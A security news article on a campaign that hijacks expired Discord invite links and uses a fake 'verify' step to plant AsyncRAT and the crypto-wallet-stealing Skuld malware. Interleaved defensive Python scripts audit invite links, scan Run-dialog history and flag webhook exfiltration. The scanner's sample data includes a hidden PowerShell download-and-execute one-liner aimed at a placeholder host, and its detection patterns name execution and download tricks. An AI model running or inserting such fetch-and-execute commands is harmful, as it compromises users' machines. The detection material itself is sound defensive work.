Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets

6 Min Read

A new malware campaign is exploiting a weakness in Discord's invitation system to deliver an information stealer known as Skuld and the AsyncRAT remote access trojan.

“The attackers hijacked the links through vanity link registration, allowing them to quietly redirect users from trusted sources to malicious servers,” Check Point said in a technical report. “The attackers combined the ClickFix phishing technique, multi-stage loaders, and time-based evasion to deliver AsyncRAT and a customized Skuld Stealer targeting crypto wallets.”

The problem with Discord's invitation mechanism is that an attacker can hijack an expired or deleted invite link and secretly redirect unsuspecting users to a malicious server under their control. This also means that a user who follows a once-trusted invite link that was shared on forums and social media platforms could unwittingly land on a malicious server.

The disclosure comes more than a month after the cybersecurity company revealed another sophisticated phishing campaign that hijacked an expired vanity invite, instructed users to join a Discord server and then sent them to phishing sites to confirm ownership.

Users can create temporary, permanent or custom (vanity) invite links, and the platform prevents other legitimate servers from reclaiming invite codes that have previously expired or been deleted. However, Check Point found that the creation of custom invite links allows the reuse of expired invite codes, and in some cases even permanent invite codes that have been removed.

When a custom vanity invite link is created, Discord accepts codes that have expired or been deleted, which opens the door to abuse and allows attackers to claim such codes for malicious servers.

“This creates a serious risk. Users who follow previously trusted invitation links (for example, on websites, blogs, or forums) can be redirected without their knowledge to fake servers created by threat actors,” Check Point said.
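The hijack works because a published invite code can later resolve to a different server than the one it was shared for. A community that has posted invite links on its website or forums can audit them by resolving each code and comparing the returned guild ID against the guild it was published for. The script below is an added example and is not part of the report or of any Discord tooling; the endpoint `GET https://discord.com/api/v10/invites/{code}` is Discord's public invite lookup, while the guild IDs, invite codes and API responses used in the offline run are constructed placeholders.

```python
"""Audit published Discord invite links: does each code still resolve to our guild?

Added example (not from the Check Point report). Discord's public endpoint
GET https://discord.com/api/v10/invites/{code} returns JSON with a partial
"guild" object containing "id" and "name"; unknown or expired codes return 404.
The sample responses and guild IDs below are constructed placeholders.
"""
import json
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

DISCORD_INVITE_API = "https://discord.com/api/v10/invites/{code}?with_expiration=true"


@dataclass
class InviteCheck:
    code: str
    ok: bool
    reason: str


def fetch_invite(code: str, timeout: float = 10.0) -> Optional[dict]:
    """Resolve an invite code via the live API. Returns None when the code is unknown (404)."""
    req = urllib.request.Request(
        DISCORD_INVITE_API.format(code=code),
        headers={"User-Agent": "invite-audit/1.0"},  # assumed, arbitrary agent string
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as exc:
        if exc.code == 404:
            return None
        raise


def check_invite(code: str, expected_guild_id: str, invite: Optional[dict]) -> InviteCheck:
    """Compare what an invite currently resolves to against the guild it was published for.

    A code that no longer resolves is reported as a failure too: a dead code is
    exactly what a vanity registration could later claim, so the link should be
    removed from every place it was shared.
    """
    if invite is None:
        return InviteCheck(code, False, "invite no longer resolves; remove the published link")
    guild = invite.get("guild") or {}
    guild_id = guild.get("id")
    if guild_id is None:
        return InviteCheck(code, False, "response carries no guild object")
    if guild_id != expected_guild_id:
        return InviteCheck(code, False,
                           f"resolves to a different guild {guild_id} ({guild.get('name')!r})")
    return InviteCheck(code, True, f"resolves to expected guild {guild.get('name')!r}")


def audit(links: Dict[str, str],
          resolver: Callable[[str], Optional[dict]]) -> List[InviteCheck]:
    """links maps invite code -> expected guild id; resolver maps code -> API JSON or None."""
    return [check_invite(code, gid, resolver(code)) for code, gid in links.items()]


# Constructed sample responses standing in for the live API (all IDs are placeholders).
SAMPLE_RESPONSES: Dict[str, Optional[dict]] = {
    "ourcommunity": {"code": "ourcommunity",
                     "guild": {"id": "100000000000000001", "name": "Our Community"}},
    "oldsupport": {"code": "oldsupport",
                   "guild": {"id": "999999999999999999", "name": "Verify Here"}},
    "deadlink": None,
}
# Every one of these codes was (hypothetically) published for the same guild.
PUBLISHED_LINKS: Dict[str, str] = {code: "100000000000000001" for code in SAMPLE_RESPONSES}


def sample_audit() -> List[InviteCheck]:
    """Offline run over the constructed responses."""
    return audit(PUBLISHED_LINKS, SAMPLE_RESPONSES.get)


if __name__ == "__main__":
    for result in sample_audit():  # swap in fetch_invite as the resolver for a live audit
        print("OK " if result.ok else "BAD", result.code, "-", result.reason)
```

For a live audit, pass `fetch_invite` as the resolver instead of `SAMPLE_RESPONSES.get`. The check is deliberately keyed on the guild ID rather than the server name, since a hijacked server can copy the original's name and icon.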


Discord invite-link hijacking involves taking control of invite links originally shared by legitimate communities and using them to redirect users to malicious servers. Users who fall for the scheme and join the server are asked to complete a verification step, authorizing a bot, in order to obtain full access to the server.

This is where the attackers incorporate the infamous ClickFix social engineering tactic to take the attack to the next level, tricking users into infecting their own systems under the pretext of verification.

Specifically, clicking the Verify button silently runs JavaScript that copies a PowerShell command to the machine's clipboard. The user is then told to open the Windows Run dialog, paste the already copied “verification string” (i.e. the PowerShell command) and press Enter to prove they are human.

In reality, carrying out these steps triggers the download of a PowerShell script hosted on Pastebin, which then retrieves and runs the first-stage downloader.
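Because ClickFix relies on the victim pasting the command into the Run dialog, the command is recorded in the per-user `RunMRU` registry key (`HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`), where each value holds the typed text followed by `\1`. That makes the key a cheap triage artifact for this step of the chain. The scanner below is an added example, not part of the report; it works over an exported copy of the key so that it runs offline, and the entries it scans are constructed samples, not commands from the campaign.

```python
"""Flag ClickFix-style entries in exported Windows RunMRU values.

Added example (not from the Check Point report). RunMRU stores what a user typed
into the Run dialog, one value per entry, data ending in "\\1", plus an "MRUList"
value giving the ordering. The sample export below is constructed.
"""
import re
from typing import Dict, List

# Indicators typical of a copied-to-clipboard PowerShell one-liner. Each pattern is
# paired with a label so an analyst can see why an entry was flagged.
INDICATORS = [
    (r"\b(powershell|pwsh)(\.exe)?\b", "powershell launcher"),
    (r"\b(mshta|cmd|wscript|cscript)(\.exe)?\b", "script host launcher"),
    (r"-(w|window(style)?)\s+hidden\b", "hidden window"),
    (r"-(e|ec|enc|encodedcommand)\b", "encoded command"),
    (r"\b(iex|invoke-expression)\b", "in-memory execution"),
    (r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", "web download"),
    (r"https?://", "embedded URL"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), label) for p, label in INDICATORS]

# Hand-made sample export: value name -> raw data. Names follow the real key's
# convention (single letters plus MRUList). Commands are illustrative, not real IoCs.
SAMPLE_RUNMRU: Dict[str, str] = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "iwr https://paste.example.invalid/raw/abc | iex"\\1',
}


def parse_runmru(values: Dict[str, str]) -> List[str]:
    """Return typed commands in most-recent-first order, stripping the trailing \\1."""
    order = values.get("MRUList", "")
    names = [n for n in order if n in values] or sorted(k for k in values if k != "MRUList")
    commands = []
    for name in names:
        data = values[name]
        commands.append(data[:-2] if data.endswith("\\1") else data)
    return commands


def classify(command: str) -> List[str]:
    """List the indicator labels that match one Run-dialog command."""
    return [label for rx, label in COMPILED if rx.search(command)]


def scan_runmru(values: Dict[str, str], min_hits: int = 2) -> List[dict]:
    """Flag commands matching at least min_hits indicators (one hit alone is too noisy:
    launching plain 'powershell' from Run is legitimate)."""
    findings = []
    for cmd in parse_runmru(values):
        hits = classify(cmd)
        if len(hits) >= min_hits:
            findings.append({"command": cmd, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan_runmru(SAMPLE_RUNMRU):
        print("SUSPICIOUS:", f["command"])
        print("   reasons:", ", ".join(f["indicators"]))
```

In an investigation the same logic can be pointed at a registry hive parsed with a forensic library, and a hit should be correlated with a process-creation event for `explorer.exe` spawning PowerShell at the matching time, which is the process lineage ClickFix produces.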

At the heart of the attack is a meticulously designed multi-stage infection process built for both precision and stealth, which uses sandbox checks to evade security protections.

AsyncRAT, which gives the attackers comprehensive remote control over infected systems, has been found to employ a technique called dead drop resolver: it reads a Pastebin file to obtain the address of the actual command-and-control (C2) server.

The other payload is Skuld, a Golang information stealer downloaded from Bitbucket that is equipped to steal sensitive user data from Discord, various browsers, crypto wallets and gaming platforms.

Skuld can also harvest crypto wallet seed phrases and passwords from the Exodus and Atomic crypto wallets. This is achieved using an approach called wallet injection, which replaces legitimate application files with trojanized versions downloaded from GitHub. It is worth noting that a similar technique was recently used by a rogue npm package named pdf-to-office.


The attack uses a custom version of an open-source tool known as ChromeKatz to bypass Chrome's app-bound encryption protections. The collected data is exfiltrated to the attackers via a Discord webhook.

The fact that payload delivery and data exfiltration take place through trusted cloud services such as GitHub, Bitbucket, Pastebin and Discord allows the threat actors to blend in with normal traffic and fly under the radar. Discord has since disabled the malicious bot, effectively breaking the attack chain.
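Blending into trusted services does not make the traffic invisible; it changes what to look for. Egress to Pastebin raw endpoints or HTTP POSTs to Discord webhook URLs from a non-browser client on an endpoint that has no business with either is a usable signal for the dead-drop and exfiltration steps described above. The detector below is an added example, not part of the report, and runs over constructed proxy log lines in a simple `timestamp client method url user-agent` layout that is assumed for the demonstration.

```python
"""Spot dead-drop lookups and webhook exfiltration in proxy logs.

Added example (not from the Check Point report). Log format is assumed:
    <iso-timestamp> <client-ip> <method> <url> "<user-agent>"
All lines below are constructed; the hosts are real services, the paths are not IoCs.
"""
import re
from collections import defaultdict
from typing import Dict, List

LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')

# Host/path shapes worth alerting on. Both services are legitimate; the signal is
# which paths are hit, with which HTTP method, by which client software.
RULES = [
    ("pastebin-raw-fetch", "GET", re.compile(r"^https?://pastebin\.com/raw/", re.I)),
    ("discord-webhook-post", "POST", re.compile(r"^https?://(canary\.|ptb\.)?discord(app)?\.com/api/webhooks/", re.I)),
]
# User-agent prefixes emitted by scripting runtimes rather than interactive browsers.
SCRIPT_AGENTS = ("Mozilla/5.0 (Windows NT; Windows NT", "Go-http-client", "python-requests", "curl/")

SAMPLE_LOG = """\
2025-06-12T10:01:02Z 10.0.0.5 GET https://discord.com/channels/@me "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2025-06-12T10:02:10Z 10.0.0.5 GET https://pastebin.com/raw/placeholder1 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
2025-06-12T10:02:11Z 10.0.0.5 GET https://bitbucket.org/placeholder/loader/downloads/x.bin "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
2025-06-12T10:05:40Z 10.0.0.5 POST https://discord.com/api/webhooks/000000000000000000/placeholder "Go-http-client/1.1"
2025-06-12T10:06:00Z 10.0.0.7 GET https://pastebin.com/raw/placeholder2 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/126.0"
"""


def parse_line(line: str) -> dict:
    m = LOG_LINE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    ts, client, method, url, agent = m.groups()
    return {"ts": ts, "client": client, "method": method.upper(), "url": url, "agent": agent}


def is_script_agent(agent: str) -> bool:
    return agent.startswith(SCRIPT_AGENTS)


def detect(log_text: str) -> Dict[str, List[dict]]:
    """Return alerts grouped by client IP. Matches from interactive browsers are kept
    as low-severity context; script-runtime user agents raise severity to high."""
    alerts: Dict[str, List[dict]] = defaultdict(list)
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        for name, method, pattern in RULES:
            if rec["method"] == method and pattern.match(rec["url"]):
                severity = "high" if is_script_agent(rec["agent"]) else "low"
                alerts[rec["client"]].append({"rule": name, "severity": severity, "ts": rec["ts"]})
    return dict(alerts)


def high_severity_clients(log_text: str) -> List[str]:
    """Clients with at least one high-severity hit, sorted for stable output."""
    return sorted(c for c, hits in detect(log_text).items()
                  if any(h["severity"] == "high" for h in hits))


if __name__ == "__main__":
    for client, hits in detect(SAMPLE_LOG).items():
        for h in hits:
            print(f"{h['severity']:4} {client} {h['ts']} {h['rule']}")
```

A single Pastebin fetch from a browser is ordinary; the combination seen for `10.0.0.5` (a PowerShell user agent pulling a raw paste, followed minutes later by a webhook POST from a Go HTTP client) is the sequence this campaign produces, so the two rules are most useful when correlated per host over a short window.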

Check Point said it has identified another campaign mounted by the same threat actors, which distributed the loader disguised as a modified version of Hacktool for unlocking pirated games. That malware, also hosted on Bitbucket, has been downloaded 350 times.

The victims of these campaigns are assessed to be located primarily in the United States, Vietnam, France, Germany, Slovakia, Austria, the Netherlands and the United Kingdom.

The findings are the latest example of how cybercriminals target popular social platforms.

“This campaign shows how a subtle feature of Discord's invitation system, the reuse of expired or deleted invitation codes in vanity invite links, can be turned into a powerful attack vector,” the researchers said. “By hijacking a legitimate invitation link, the threat actor quietly redirects unsuspecting users to a malicious server.”

“The choice of payloads, including a stealer that specifically targets cryptocurrency wallets, suggests that the attackers are primarily focused on crypto users and motivated by financial gain.”
